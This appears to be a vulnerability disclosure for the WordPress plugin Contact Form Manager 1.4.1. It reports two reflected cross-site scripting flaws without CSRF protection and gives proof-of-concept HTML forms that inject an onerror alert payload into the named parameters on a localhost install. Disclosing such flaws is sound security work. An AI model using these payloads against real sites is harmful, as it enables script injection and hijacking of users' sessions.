Hello,

Plugin: Contact Form Manager 1.4.1 https://wordpress.org/plugins/contact-form-manager/

1. Reflected Cross-Site Scripting (XSS)

Authenticated users (like subscribers) can inject html/js code (there is no CSRF protection!).

Method: POST

Url: http://localhost/wp-admin/admin-ajax.php?action=ajax_load_elements

Vulnerable parameters: formId

Example PHP callstack:

xyz_cfm_ajax_load_elements   [/contact-form-manager/admin/ajax-load-elements.php:34]

Verification:

--

<form method="POST" action="http://localhost/wp-admin/admin-ajax.php?action=ajax_load_elements" />

<input type="text" name="formId" value='</script><img src=x onerror=alert(1) />' />

<input type="submit" />

</form>

--

2. Reflected Cross-Site Scripting (XSS)

Authenticated administrators can inject html/js code (there is no CSRF protection!).

Method: POST

Url: http://localhost/wp-admin/admin.php?page=contact-form-manager-manage

Vulnerable parameters: xyz_cfm_pagelimit, xyz_cfm_recaptchaPrivateKey, xyz_cfm_recaptchaPublicKey

Example PHP callstack:

/contact-form-manager/admin/setting.php:191

Verification:

--

<form method="POST" action="http://localhost/wp-admin/admin.php?page=contact-form-manager-manage" />

<input type="text" name="xyz_cfm_pagelimit" value='"><img src=x onerror=alert(1) />' />

<input type="submit" />

</form>

--